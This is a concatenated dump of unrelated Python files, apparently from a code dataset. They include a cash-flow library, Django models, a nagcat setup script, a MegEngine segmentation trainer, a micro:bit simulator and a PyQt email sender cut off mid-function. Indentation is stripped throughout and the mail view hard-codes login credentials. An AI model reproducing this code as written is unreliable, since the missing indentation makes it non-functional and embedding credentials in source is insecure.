for item in self.domain:
payoff = self._flows.get(item, 0.)
if not isinstance(payoff, (int, float)):
if _ is None:
if hasattr(self, 'payoff_model'):
_ = self.payoff_model
elif hasattr(self, 'forward_curve'):
_ = self.forward_curve
payoff = payoff(_)
flows.append(payoff)
return CashFlowList(self.domain, flows, self._origin)
def __add__(self, other):
for k in self._flows:
self._flows[k].__add__(other)
def __sub__(self, other):
for k in self._flows:
self._flows[k].__sub__(other)
def __mul__(self, other):
for k in self._flows:
self._flows[k].__mul__(other)
def __truediv__(self, other):
for k in self._flows:
self._flows[k].__truediv__(other)
def __str__(self):
inner = tuple()
if self.domain:
s, e = self.domain[0], self.domain[-1]
inner = f'[{s!r} ... {e!r}]', \
f'[{self._flows[s]!r} ... {self._flows[e]!r}]'
kw = self.kwargs
kw.pop('amount_list', ())
kw.pop('payment_date_list', ())
inner += tuple(f"{k!s}={v!r}" for k, v in kw.items())
s = self.__class__.__name__ + '(' + ', '.join(inner) + ')'
return s
def __repr__(self):
s = self.__class__.__name__ + '()'
if self.domain:
fill = ',\n' + ' ' * (len(s) - 1)
kw = self.kwargs
inner = \
str(kw.pop('payment_date_list', ())), \
str(kw.pop('amount_list', ()))
inner += tuple(f"{k!s}={v!r}" for k, v in kw.items())
s = self.__class__.__name__ + '(' + fill.join(inner) + ')'
return s
class CashFlowLegList(CashFlowList):
""" MultiCashFlowList """
@property
def legs(self):
""" list of |CashFlowList| """
return list(self._legs)
def __init__(self, legs):
""" container class for CashFlowList
:param legs: list of |CashFlowList|
"""
for leg in legs:
if not isinstance(leg, (CashFlowList, RateCashFlowList)):
cls = self.__class__.__name__, leg.__class__.__name__
raise ValueError("Legs %s of can be either `CashFlowList` "
"or `RateCashFlowList` but not %s." % cls)
self._legs = legs
domains = tuple(tuple(leg.domain) for leg in self._legs)
domain = list(sorted(set().union(*domains)))
origin = min(leg.origin for leg in self._legs)
super().__init__(domain, [0] * len(domain), origin=origin)
def __getitem__(self, item):
""" getitem does re-calc float cash flows and
does not use store notional values """
if isinstance(item, (tuple, list)):
return tuple(self[i] for i in item)
else:
return sum(
float(leg[item]) for leg in self._legs if item in leg.domain)
def __add__(self, other):
for leg in self._legs:
leg.__add__(other)
def __sub__(self, other):
for leg in self._legs:
leg.__sub__(other)
def __mul__(self, other):
for leg in self._legs:
leg.__mul__(other)
def __truediv__(self, other):
for leg in self._legs:
leg.__truediv__(other)
class FixedCashFlowList(CashFlowList):
_header_keys = 'cashflow', 'pay date'
def __init__(self, payment_date_list, amount_list=DEFAULT_AMOUNT,
origin=None):
""" basic cashflow list object
:param payment_date_list: list of cashflow payment dates
:param amount_list: list of cashflow amounts
:param origin: origin of object,
i.e. start date of the cashflow list as a product
"""
if isinstance(payment_date_list, CashFlowList):
amount_list = payment_date_list[payment_date_list.domain]
origin = origin or getattr(payment_date_list, '_origin', None)
payment_date_list = payment_date_list.domain
if isinstance(amount_list, (int, float)):
amount_list = [amount_list] * len(payment_date_list)
payoff_list = tuple(FixedCashFlowPayOff(amount=a) for a in amount_list)
super().__init__(payment_date_list, payoff_list, origin=origin)
class RateCashFlowList(CashFlowList):
""" list of cashflows by interest rate payments """
_cashflow_details = 'cashflow', 'pay date', 'notional', \
'start date', 'end date', 'year fraction', \
'fixed rate', 'forward rate', 'fixing date', 'tenor'
def __init__(self, payment_date_list, amount_list=DEFAULT_AMOUNT,
origin=None, day_count=None,
fixing_offset=None, pay_offset=None,
fixed_rate=0., forward_curve=None):
r""" list of interest rate cashflows
:param payment_date_list: pay dates, assuming that pay dates agree
with end dates of interest accrued period
:param amount_list: notional amounts
:param origin: start date of first interest accrued period
:param day_count: day count convention
:param fixing_offset: time difference between
interest rate fixing date and interest period payment date
:param pay_offset: time difference between
interest period end date and interest payment date
:param fixed_rate: agreed fixed rate
:param forward_curve: interest rate curve for forward estimation
Let $t_0$ be the list **origin**
and $t_i$ $i=1, \dots n$ the **payment_date_list**
with $N_i$ $i=1, \dots n$ the notional **amount_list**.
Moreover, let $\tau$ be the **day_count** function,
$c$ the **fixed_rate** and $f$ the **forward_curve**.
Then, the rate cashflow $cf_i$ payed at time $t_i$ will be
with
$s_i = t_{i-1} - \delta$,
$e_i = t_i -\delta$
as well as
$d_i = s_i - \epsilon$
for **pay_offset** $\delta$ and **fixing_offset** $\epsilon$,
$$cf_i = N_i \cdot \tau(s_i,e_i) \cdot (c + f(d_i)).$$
Note, the **pay_offset** $\delta$ is not applied
in case of the first cashflow, then $s_1=t_0$.
"""
if isinstance(amount_list, (int, float)):
amount_list = [amount_list] * len(payment_date_list)
if origin is not None:
start_dates = [origin]
start_dates.extend(payment_date_list[:-1])
elif origin is None and len(payment_date_list) > 1:
step = payment_date_list[1] - payment_date_list[0]
start_dates = [payment_date_list[0] - step]
start_dates.extend(payment_date_list[:-1])
elif payment_date_list:
start_dates = payment_date_list
payoff_list = list()
for s, e, a in zip(start_dates, payment_date_list, amount_list):
if pay_offset:
e -= pay_offset
s -= pay_offset
payoff = RateCashFlowPayOff(
start=s, end=e, day_count=day_count,
fixing_offset=fixing_offset, amount=a,
fixed_rate=fixed_rate
)
payoff_list.append(payoff)
super().__init__(payment_date_list, payoff_list, origin=origin)
self.forward_curve = forward_curve
r""" cashflow forward curve to derive float rates $f$ """
@property
def fixed_rate(self):
fixed_rates = tuple(cf.fixed_rate for cf in self._flows.values())
if len(set(fixed_rates)) == 1:
return fixed_rates[0]
@fixed_rate.setter
def fixed_rate(self, value):
for cf in self._flows.values():
cf.fixed_rate = value
| 2.671875 | 3 |
oosc/oosc/counties/admin.py | C4DLabOrg/da_api | 0 | 12761016 | <reponame>C4DLabOrg/da_api
from django.contrib import admin
from oosc.counties.models import Counties
# Register your models here.
class classAdmin(admin.ModelAdmin):
list_display=['county_name','id','lat','lng']
admin.site.register(Counties,classAdmin);
| 1.890625 | 2 |
contacts/migrations/0001_initial.py | Ratgor/iLikeit-voting-platform | 0 | 12761017 | <gh_stars>0
# Generated by Django 3.1.2 on 2021-02-13 16:28
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Contact',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('owners', models.ManyToManyField(blank=True, null=True, related_name='contacts', to=settings.AUTH_USER_MODEL)),
('relatedUsers', models.ManyToManyField(blank=True, null=True, related_name='relatedUsers', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Feature',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('header', models.TextField(blank=True, null=True)),
('content', models.TextField(blank=True, null=True)),
('tags', models.JSONField(blank=True, null=True)),
('date', models.DateTimeField(auto_now_add=True)),
('verified', models.BooleanField(default=False)),
('encrypted', models.BooleanField(default=True)),
('relatedContacts', models.ManyToManyField(blank=True, null=True, related_name='contacts', to='contacts.Contact')),
],
),
]
| 1.851563 | 2 |
SSLChecker/sharedcode/results.py | tdensmore/SSLChecker | 0 | 12761018 | # Setters for the results dictionary
def set_error(name, message):
global _error
_error = {}
_error = {"Hostname": name, "Message": message}
return _error
def new():
return {
'Hostname': None,
'IP': None,
'MD5': None,
'View': None,
'Results': []
}
def set_result(results, key, value):
results[key] = value
def set_ciphers(results, value):
results['Results'].append(value)
| 2.71875 | 3 |
setup.py | marineam/nagcat | 0 | 12761019 | #!/usr/bin/env python
import os
import stat
from glob import glob
from distutils import log
from distutils.core import setup
from distutils.extension import Extension
from distutils.command.build_py import build_py as du_build_py
from twisted.python.dist import getPackages
# distutils doesn't provide a way to make some package data executable
# but nagcat requires a test script for unit testing, so hack time.
package_scripts = ["python/nagcat/unittests/queries/simple_subprocess"]
class build_py(du_build_py):
def copy_file(self, infile, outfile, **kwargs):
du_build_py.copy_file(self, infile, outfile, **kwargs)
# Ripped out of install_scripts, might as well be consistent.
if os.name == 'posix' and infile in package_scripts:
if self.dry_run:
log.info("changing mode of %s", outfile)
else:
mode = ((os.stat(outfile)[stat.ST_MODE]) | 0555) & 07777
log.info("changing mode of %s to %o", outfile, mode)
os.chmod(outfile, mode)
setup_args = dict(
name = "nagcat",
author = "<NAME>",
author_email = "<EMAIL>",
url = "http://code.google.com/p/nagcat/",
license = "Apache 2.0",
packages = getPackages("python/nagcat") +
getPackages("python/snapy") +
getPackages("python/twirrdy"),
package_data = {'nagcat': ["plugins/dropin.cache",
"unittests/trend_data*",
"unittests/ssl/*",
"unittests/queries/oracle_package.sql",
"unittests/queries/simple_subprocess"],
'snapy': ["netsnmp/unittests/snmpd.conf"]},
package_dir = {'': "python"},
scripts = glob("bin/*"),
data_files = [('share/doc/nagcat', ["README", "LICENSE"]),
('share/doc/nagcat/docs', glob("docs/*.*"))],
cmdclass = {'build_py': build_py},
)
# Nagcat works without Cython so make it optional
try:
from Cython.Distutils import build_ext
setup_args['ext_modules'] = [Extension("nagcat._object_parser_c",
["python/nagcat/_object_parser_c.pyx"])]
setup_args['cmdclass']['build_ext'] = build_ext
except ImportError:
pass
setup(**setup_args)
| 1.84375 | 2 |
nonrepeating.py | crsiebler/NonRepeatingString | 0 | 12761020 | <filename>nonrepeating.py
from queue import Queue
"""Script to find the first non-repeating string in a stream.
This module reads a file called stream.txt to create a stream of strings. As a string is received, return the first
non-repeating string in the stream.
Example:
$ python nonrepeating.py
Todo:
* Add input argument for file to parse as stream
* Create separate main so this is separate module
"""
def non_repeating(value, counts, q):
"""Finds the first non-repeating string in a stream.
Args:
value (str): Latest string received in the string
counts (dict): Dictionary of strings containing the counts to determine if string is repeated
q (Queue): Container for all strings in stream that have yet determined as being repeated
Return:
str: First non-repeating string. None if all strings are repeated.
"""
q.put(value)
if value in counts:
counts[value] += 1
else:
counts[value] = 1
while not q.empty():
if counts[q.queue[0]] > 1:
q.get()
else:
return q.queue[0]
if q.empty():
return None
def process_stream():
"""Processes the input file as a stream.
"""
counts = {}
q = Queue()
with open('stream.txt') as stream:
[print(non_repeating(value.strip(), counts, q)) for value in stream.readlines()]
def main():
"""Driver method.
"""
process_stream()
if __name__ == '__main__':
main()
| 4.0625 | 4 |
src/service/python/perf_test.py | songweijia/cascade | 21 | 12761021 | <reponame>songweijia/cascade<gh_stars>10-100
#!/usr/bin/env python3
import cascade_py
import threading
import time
import math
import sys
import cProfile, pstats, io
class AtomicInteger():
def __init__(self, value=0):
self._value = value
self._lock = threading.Lock()
def inc(self):
with self._lock:
self._value += 1
return self._value
def dec(self):
with self._lock:
self._value -= 1
return self._value
@property
def value(self):
with self._lock:
return self._value
@value.setter
def value(self, v):
with self._lock:
self._value = v
return self._value
class client_states:
# 1. transmittion depth for throttling the sender
# 0 for unlimited.
max_pending_ops = 0
# 2. message traffic
num_messages = 0
message_size = 0
# 3. tx semaphore
idle_tx_slot_cv = None
idle_tx_slot_cnt = None
idle_tx_slot_mutex = None
# 4. future queue semaphore
future_queue = []
future_queue_cv = None
future_queue_mutex = None
# 5. timestamps log for statistics
send_tss = []
recv_tss = []
# 6. thread
poll_thread = None
def __init__(self, _max_pending_ops, _num_messages, _message_size):
self.num_messages = _num_messages
self.max_pending_ops = _max_pending_ops
self.message_size = _message_size
self.idle_tx_slot_cnt = AtomicInteger(_max_pending_ops)
self.idle_tx_slot_mutex = threading.RLock()
self.idle_tx_slot_cv = threading.Condition(self.idle_tx_slot_mutex)
self.future_queue_mutex = threading.RLock()
self.future_queue_cv = threading.Condition(self.future_queue_mutex)
self.client = cascade_py.ServiceClientAPI()
self.poll_thread = threading.Thread(target = self.poll_results)
self.send_tss = [0 for i in range(0,_num_messages)]
self.recv_tss = [0 for i in range(0,_num_messages)]
def poll_results(self):
future_counter = 0
while(future_counter != self.num_messages):
my_future_queue = []
with self.future_queue_mutex:
while(len(self.future_queue) == 0):
try:
self.future_queue_cv.wait()
except:
print("Oh No!")
my_future_queue, self.future_queue = self.future_queue, my_future_queue
for qr in my_future_queue:
store = qr.get_result()
self.recv_tss[future_counter] = time.time() * (10**6)
future_counter+=1
if(self.max_pending_ops > 0):
with self.idle_tx_slot_mutex:
self.idle_tx_slot_cnt.inc()
self.idle_tx_slot_cv.notifyAll()
if(future_counter == self.num_messages):
break
#print("polling thread shuts down!!")
def wait_poll_all():
self.poll_thread.join()
def do_send(self, msg_cnt, typ, key, val):
# wait for tx slot semaphore
if(self.max_pending_ops > 0):
with self.idle_tx_slot_mutex:
while(self.idle_tx_slot_cnt.value <= 0):
try:
self.idle_tx_slot_cv.wait()
except:
print("Oh No but here")
self.idle_tx_slot_cnt.dec()
# record the send time
self.send_tss[msg_cnt] = time.time() * (10**6)
#print("Start put")
qr = self.client.put(typ, key, val, 0, 0)
with self.future_queue_mutex:
self.future_queue.append(qr)
self.future_queue_cv.notifyAll()
#print("Finished send")
def print_statistics(self):
for i in range(0, self.num_messages):
print(self.send_tss[i],self.recv_tss[i], (self.recv_tss[i] - self.send_tss[i]))
total_bytes = self.num_messages * self.message_size
timespan_us = self.recv_tss[self.num_messages-1] - self.send_tss[0]
thp_MBps = total_bytes * 1000000.0 / 1048576 / timespan_us
thp_ops = self.num_messages*1000000.0/timespan_us
s = 0.0
for i in range(0,self.num_messages):
s += self.recv_tss[i]-self.send_tss[i]
avg_latency_us = s/self.num_messages
ssum = 0.0
for i in range(0,self.num_messages):
ssum += (self.recv_tss[i]-self.send_tss[i]-avg_latency_us) * (self.recv_tss[i]-self.send_tss[i]-avg_latency_us)
std_latency_us = math.sqrt(ssum/(self.num_messages + 1))
print("Message size (KiB):", self.message_size / 1024.0)
print("Throughput (MiB/s):", thp_MBps)
print("Throughput (Ops/s):", thp_ops)
print("Average-Latency (us):", avg_latency_us)
print("Latency-std (us):", std_latency_us)
def randomize_key(i):
random_seed = int(time.time() * (10**6))
x = i ^ random_seed
x ^= x << 13
x ^= x >> 7
x ^= x << 17
return x
def main():
if(len(sys.argv[1:]) < 4):
print("USAGE: python3 perf_test.py <test_type> <num_messages> <is_persistent> <msg_size> [max_pending_ops]")
print()
print("max_pending_ops is the maximum number of pending operations allowed. Default is unlimited.")
max_distinct_objects = 4096
typ = sys.argv[1]
num_messages = int(sys.argv[2])
is_persistent = int(sys.argv[3])
message_size = int(sys.argv[4])
max_pending_ops = -1
if(len(sys.argv[1:]) >= 5):
max_pending_ops = int(sys.argv[5])
if(typ != "put"):
print("Sorry not support method")
sys.exit()
if(is_persistent > 0):
print("starting persistant")
pers_client = client_states(max_pending_ops, num_messages, message_size)
bb = bytes(message_size)
#start thread
pers_client.poll_thread.start()
#sending
for i in range(0,num_messages):
key = str(randomize_key(i) % max_distinct_objects)
#print("key",key)
pers_client.do_send(i, "PCSU", key, bb)
try:
pers_client.poll_thread.join()
except:
print("Persistant Thread Fail")
pers_client.print_statistics()
else:
print("starting volatile")
vol_client = client_states(max_pending_ops, num_messages, message_size)
bb = bytes(message_size)
#start thread
vol_client.poll_thread.start()
#sending
for i in range(0,num_messages):
key = str(randomize_key(i) % max_distinct_objects)
print("key",key)
vol_client.do_send(i, "VCSU", key, bb)
try:
vol_client.poll_thread.join()
except:
print("Volatile Thread Fail")
vol_client.print_statistics()
print("Done with Performance test")
#print stats
def main2():
pr = cProfile.Profile()
pr.enable()
main()
s = io.StringIO()
ps = pstats.Stats(pr)
ps.print_stats()
print(s.getvalue())
if __name__ == '__main__':
main()
| 2.34375 | 2 |
snippets/microbit/microbit/__init__.py | owainkenwayucl/Garbage | 0 | 12761022 |
import tkinter as tk
import time
# Routine for non-implemented features.
def NOTIMPLEMENTED():
print(">>> Not implemented <<<")
# Simulate the face buttons.
class MicrobitButton(tk.Button):
def setup(self):
self.presses = 0
self.state = False
self.bind("<Button-1>", self.bpress)
self.bind("<ButtonRelease-1>", self.bunpress)
def get_presses(self):
return self.presses
def is_pressed(self):
return self.state
def bpress(self,x):
self.state = True
def bunpress(self,x):
self.state = False
self.increment()
def increment(self):
self.presses = self.presses + 1
class Image:
def __init__(self):
self.data = [x[:] for x in [[0] * 5] * 5]
def __init__(self, image_data):
self.data = [x[:] for x in [[0] * 5] * 5]
if type(image_data) is str:
if len(image_data) == 1:
NOTIMPLEMENTED()
else:
l = image_data.split(":")
for j in range(5):
for i in range(5):
self.data[i][j] = int(l[j][i])
else:
for j in range(5):
for i in range(5):
self.data[i][j] = int(image_data[j][i])
class ledpack:
def __init__(self, canvas, context):
self.context = context
self.leds = [x[:] for x in [[0] * 5] * 5]
self.canvas = canvas
self.draw_leds()
self.turnedon=True
def draw_leds(self):
self.canvas.create_rectangle(0,0,200,200,fill='black')
for i in range(5):
for j in range(5):
if self.leds[i][j] >= 1:
shade = hex(int((self.leds[i][j] * 32) - 1))[2:]
if len(shade) == 1:
shade = "0" + shade
shade = "#" + shade + "0000"
self.canvas.create_rectangle(i*40,j*40,(i+1)*40,(j+1)*40,fill=shade)
self.canvas.update_idletasks()
self.context.update()
def set_pixel(self, x, y, value):
self.leds[x][y] = value
self.draw_leds()
def get_pixel(self, x, y):
return self.leds[x][y]
def clear(self):
self.leds = [x[:] for x in [[0] * 5] * 5]
self.draw_leds()
def on(self):
self.turnedon = True
def off(self):
self.turnedon = False
def is_on(self):
return self.turnedon
def read_light_level(self):
NOTIMPLEMENTED()
return 0
def scroll(self, value, delay=400, wait=True, loop=False, monospace=False):
NOTIMPLEMENTED()
def show(self, image):
for i in range(5):
for j in range(5):
self.leds[i][j] = image.data[i][j]
self.draw_leds()
# Set up stuff when imported.
_mb_win = tk.Tk()
_mb_win.title("Macro:Bit")
button_a = MicrobitButton(_mb_win, text="A")
button_b = MicrobitButton(_mb_win, text="B")
button_a.setup()
button_b.setup()
button_a.pack(side=tk.LEFT)
button_b.pack(side=tk.RIGHT)
_mb_can = tk.Canvas(_mb_win, width=200, height=200)
display = ledpack(_mb_can, _mb_win)
_mb_can.pack(expand=tk.YES, fill=tk.BOTH) | 3 | 3 |
codes/tests/test_rotation.py | k1101jh/Alpha-Zero | 1 | 12761023 | import numpy as np
def test_rotation():
board_size = 3
states = np.array([[[[1, 2, 0],
[2, 1, 0],
[0, 1, 2]]],
[[[0, 3, 4],
[0, 0, 0],
[2, 1, 0]]]])
visit_counts = np.array([[0, 0, 3,
0, 0, 2,
1, 0, 0],
[5, 0, 0,
6, 7, 8,
0, 0, 9]])
new_states = []
new_visit_counts = []
for state, visit_count in zip(states, visit_counts):
for i in range(4):
rotated_state = np.rot90(state, i, axes=(1, 2))
rotated_visit_count = np.rot90(visit_count.reshape(board_size, board_size), i, axes=(0, 1))
new_states.append(rotated_state)
new_visit_counts.append(rotated_visit_count)
new_states.append(np.flip(rotated_state, 2))
new_visit_counts.append(np.fliplr(rotated_visit_count))
for i, (state, visit_count) in enumerate(zip(new_states, new_visit_counts)):
print("case: ", i)
for i in range(3):
for j in range(3):
print(state[0][i][j], end=' ')
print('')
print('')
for i in range(3):
for j in range(3):
print(visit_count[i][j], end=' ')
print('')
print('')
if __name__ == "__main__":
test_rotation()
| 3.109375 | 3 |
main.py | MSD200X/Automated_music_Transcription | 84 | 12761024 | <reponame>MSD200X/Automated_music_Transcription
from flask import Flask
from flask import request
from flask import redirect, url_for, render_template
from werkzeug import secure_filename
import os
import string
import random
app = Flask(__name__)
app.config.from_object(__name__)
UPLOAD_FOLDER = '/tmp/music_files'
ALLOWED_EXTENSIONS = set(['wav'])
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
def generate_random_name(extension):
random_name = ''.join(random.SystemRandom().choice(
string.ascii_lowercase + string.digits) for _ in range(8))
return random_name + '.' + extension
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS
@app.route('/', methods=['GET', 'POST'])
def main():
if request.method == 'POST':
file = request.files['file']
if file and allowed_file(file.filename):
# filename = secure_filename(file.filename)
filename = generate_random_name('wav')
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
return render_template('main.html', filename=filename[:-4])
return render_template('main.html')
@app.route('/<filename>')
def display_sheet_notes(filename):
return render_template('display_sheet_notes.html',
filename=filename)
if __name__ == "__main__":
app.run(host='localhost', port=9090, debug=True)
| 2.734375 | 3 |
official/vision/segmentation/tools/train.py | pepperonibo/Models | 294 | 12761025 | <reponame>pepperonibo/Models
# -*- coding: utf-8 -*-
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import argparse
import os
import time
import numpy as np
import megengine as mge
import megengine.distributed as dist
import megengine.functional as F
from megengine.autodiff import GradManager
from megengine.data import DataLoader, Infinite, RandomSampler, dataset
from megengine.data import transform as T
from megengine.optimizer import SGD
from official.vision.segmentation.tools.utils import AverageMeter, get_config_info, import_from_file
logger = mge.get_logger(__name__)
logger.setLevel("INFO")
mge.device.set_prealloc_config(1024, 1024, 256 * 1024 * 1024, 4.0)
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"-f", "--file", default="net.py", type=str, help="net description file"
)
parser.add_argument(
"-n", "--devices", type=int, default=8, help="batch size for training"
)
parser.add_argument(
"-d", "--dataset_dir", type=str, default="/data/datasets",
)
parser.add_argument(
"-r", "--resume", type=str, default=None, help="resume model file"
)
args = parser.parse_args()
# ------------------------ begin training -------------------------- #
logger.info("Device Count = %d", args.devices)
log_dir = "log-of-{}".format(os.path.basename(args.file).split(".")[0])
if not os.path.isdir(log_dir):
os.makedirs(log_dir)
if args.devices > 1:
trainer = dist.launcher(worker, n_gpus=args.devices)
trainer(args)
else:
worker(args)
# pylint: disable=too-many-branches
def worker(args):
current_network = import_from_file(args.file)
model = current_network.Net(current_network.Cfg())
model.train()
if dist.get_rank() == 0:
logger.info(get_config_info(model.cfg))
logger.info(repr(model))
backbone_params = []
head_params = []
for name, param in model.named_parameters():
if "backbone" in name:
backbone_params.append(param)
else:
head_params.append(param)
opt = SGD(
[
{
"params": backbone_params,
"lr": model.cfg.learning_rate * dist.get_world_size() * 0.1,
},
{"params": head_params},
],
lr=model.cfg.learning_rate * dist.get_world_size(),
momentum=model.cfg.momentum,
weight_decay=model.cfg.weight_decay,
)
gm = GradManager()
if dist.get_world_size() > 1:
gm.attach(
model.parameters(),
callbacks=[dist.make_allreduce_cb("mean", dist.WORLD)]
)
else:
gm.attach(model.parameters())
cur_epoch = 0
if args.resume is not None:
pretrained = mge.load(args.resume)
cur_epoch = pretrained["epoch"] + 1
model.load_state_dict(pretrained["state_dict"])
opt.load_state_dict(pretrained["opt"])
if dist.get_rank() == 0:
logger.info("load success: epoch %d", cur_epoch)
if dist.get_world_size() > 1:
dist.bcast_list_(model.parameters()) # sync parameters
dist.bcast_list_(model.buffers()) # sync buffers
if dist.get_rank() == 0:
logger.info("Prepare dataset")
train_loader = iter(
build_dataloader(model.cfg.batch_size, args.dataset_dir, model.cfg)
)
for epoch in range(cur_epoch, model.cfg.max_epoch):
train_one_epoch(model, train_loader, opt, gm, epoch)
if dist.get_rank() == 0:
save_path = "log-of-{}/epoch_{}.pkl".format(
os.path.basename(args.file).split(".")[0], epoch
)
mge.save({
"epoch": epoch,
"state_dict": model.state_dict(),
"opt": opt.state_dict()
}, save_path)
logger.info("dump weights to %s", save_path)
def train_one_epoch(model, data_queue, opt, gm, epoch):
def train_func(data, label):
with gm:
pred = model(data)
loss = cross_entropy(
pred, label, ignore_label=model.cfg.ignore_label
)
gm.backward(loss)
opt.step().clear_grad()
return loss
meter = AverageMeter(record_len=1)
time_meter = AverageMeter(record_len=2)
log_interval = model.cfg.log_interval
tot_step = model.cfg.nr_images_epoch // (
model.cfg.batch_size * dist.get_world_size()
)
for step in range(tot_step):
adjust_learning_rate(opt, epoch, step, tot_step, model.cfg)
data_tik = time.time()
inputs, labels = next(data_queue)
labels = np.squeeze(labels, axis=1).astype(np.int32)
data_tok = time.time()
tik = time.time()
loss = train_func(mge.tensor(inputs), mge.tensor(labels))
tok = time.time()
time_meter.update([tok - tik, data_tok - data_tik])
if dist.get_rank() == 0:
info_str = "e%d, %d/%d, lr:%f, "
loss_str = ", ".join(["{}:%f".format(loss) for loss in ["loss"]])
time_str = ", train_time:%.3fs, data_time:%.3fs"
log_info_str = info_str + loss_str + time_str
meter.update([loss.numpy() for loss in [loss]])
if step % log_interval == 0:
logger.info(
log_info_str,
epoch,
step,
tot_step,
opt.param_groups[1]["lr"],
*meter.average(),
*time_meter.average()
)
meter.reset()
time_meter.reset()
def adjust_learning_rate(optimizer, epoch, step, tot_step, cfg):
max_iter = cfg.max_epoch * tot_step
cur_iter = epoch * tot_step + step
cur_lr = cfg.learning_rate * (1 - cur_iter / (max_iter + 1)) ** 0.9
optimizer.param_groups[0]["lr"] = cur_lr * 0.1
optimizer.param_groups[1]["lr"] = cur_lr
def cross_entropy(pred, label, axis=1, ignore_label=255):
mask = label != ignore_label
pred = pred.transpose(0, 2, 3, 1)
return F.loss.cross_entropy(pred[mask], label[mask], axis)
def build_dataloader(batch_size, dataset_dir, cfg):
if cfg.dataset == "VOC2012":
train_dataset = dataset.PascalVOC(
dataset_dir,
cfg.data_type,
order=["image", "mask"]
)
elif cfg.dataset == "Cityscapes":
train_dataset = dataset.Cityscapes(
dataset_dir,
"train",
mode='gtFine',
order=["image", "mask"]
)
else:
raise ValueError("Unsupported dataset {}".format(cfg.dataset))
train_sampler = Infinite(RandomSampler(train_dataset, batch_size, drop_last=True))
train_dataloader = DataLoader(
train_dataset,
sampler=train_sampler,
transform=T.Compose(
transforms=[
T.RandomHorizontalFlip(0.5),
T.RandomResize(scale_range=(0.5, 2)),
T.RandomCrop(
output_size=(cfg.img_height, cfg.img_width),
padding_value=[0, 0, 0],
padding_maskvalue=255,
),
T.Normalize(mean=cfg.img_mean, std=cfg.img_std),
T.ToMode(),
],
order=["image", "mask"],
),
num_workers=2,
)
return train_dataloader
if __name__ == "__main__":
main()
| 1.945313 | 2 |
src/Comunication/View/MailView.py | begbaj/progetto-ing-sw | 0 | 12761026 | <reponame>begbaj/progetto-ing-sw
import time
from email.header import Header
from email.mime.multipart import MIMEMultipart
from PyQt5.QtWidgets import QWidget
from PyQt5.uic import loadUi
from src.Comunication.Controllers.ComunicationManager import ComunicationManager
import smtplib
from email.mime.text import MIMEText
from src.Users.controllers.UserManager import UserManager
from src.Utils.UI import Popup
class MailView(QWidget):
# Manager
comunicationM = ComunicationManager()
userM = UserManager()
# Variabili per email
sender_email = ''
rec_email = ''
password = ''
server = ''
msg = ''
def __init__(self, widget):
super(MailView, self).__init__()
loadUi("../designer/Comunications/MailView.ui", self)
# Variaibili
self.widget = widget
self.comunications = self.comunicationM.list()
self.users = ''
self.comunication = ''
self.pop = ''
self.com_sub_list = ''
self.users_combo = []
self.com_rec_list = []
# Metodi Iniziali
self.setup()
# Region Set-Up
def setup(self):
self.setup_email()
self.setup_component()
def setup_component(self):
# Function Button
self.sendButton.clicked.connect(self.send)
self.refreshtextButton.clicked.connect(self.refresh_text)
self.backButton.clicked.connect(self.close)
# Field Properties
self.refreshtextButton.hide()
self.mailField.setText(self.sender_email)
self.mailField.setReadOnly(True)
self.objectMail.setReadOnly(True)
# ComboBox
self.set_combo_box()
# Progress bar
self.progressBar.setVisible(False)
#self.progressBar.setMaximum(100)
#self.progressBar.setMinimum(0)
def set_combo_box(self):
# Lista dei Messaggi Predefiniti
self.com_sub_list = []
self.com_sub_list.append('')
for com in self.comunications:
self.com_sub_list.append(com.subject)
self.messageBox.addItems(self.com_sub_list)
# Al cambiare del contenuto della comboBox cambia l'oggetto e il testo
self.messageBox.currentTextChanged.connect(self.on_message_box_changed)
# Lista Utenti che hanno registrato una mail
self.users = self.userM.list()
self.users_combo = []
self.com_rec_list = []
self.com_rec_list.append('')
for user in self.users:
if user.email != '':
self.com_rec_list.append(user.name + " " + user.surname)
self.users_combo.append(user)
self.recipientBox.addItems(self.com_rec_list)
# Al cambiare dell'utente selezionato cambia il destinatario
self.recipientBox.currentTextChanged.connect(self.on_recipient_box_changed)
self.allBox.stateChanged.connect(self.state_changed)
def setup_email(self):
# Credenziali per la mail
self.sender_email = "<EMAIL>" # Enter your address
self.password = "<PASSWORD>"
# endregion
# Region Button Function
def on_message_box_changed(self):
# Eventi della Combo Box dei messaggi
if self.messageBox.currentText() == '':
self.objectMail.setPlainText('')
self.textMail.setPlainText('')
self.refreshtextButton.hide()
self.objectMail.setReadOnly(False)
else:
self.objectMail.setPlainText(self.comunicationM.find(self.messageBox.currentIndex()).subject)
self.textMail.setPlainText(self.comunicationM.find(self.messageBox.currentIndex()).text)
self.refreshtextButton.show()
self.objectMail.setReadOnly(True)
def on_recipient_box_changed(self):
self.rec_email = self.users_combo[self.recipientBox.currentIndex() - 1].email
def send(self):
progress = 100 / self.users_combo.__len__()
self.progressBar.setVisible(True)
sum = 0
if self.allBox.isChecked() == True:
for i in range(0, self.users_combo.__len__()):
sum = sum + progress
self.progressBar.setValue(sum)
self.sendEmail(i)
#if i == (self.users_combo.__len__() - 1):
#self.progressBar.setValue(100 - progress)
self.progressBar.setVisible(False)
str = "Email inviate con successo!"
else:
self.sendEmail(self.recipientBox.currentIndex()-1)
str = "Email inviata con successo!"
self.pop = Popup(str)
self.pop.show()
print("Email has been sent to ", self.msg)
def state_changed(self):
if self.allBox.isChecked() == True:
self.recipientBox.setEnabled(False)
else:
self.recipientBox.setEnabled(True)
def sendEmail(self, i):
# Destinatario
self.rec_email = f"{self.users_combo[i].email}"
# Contenuto del Messaggio
self.msg = MIMEMultipart()
self.msg['Subject'] = Header(self.objectMail.toPlainText()).encode()
self.msg['To'] = self.rec_email
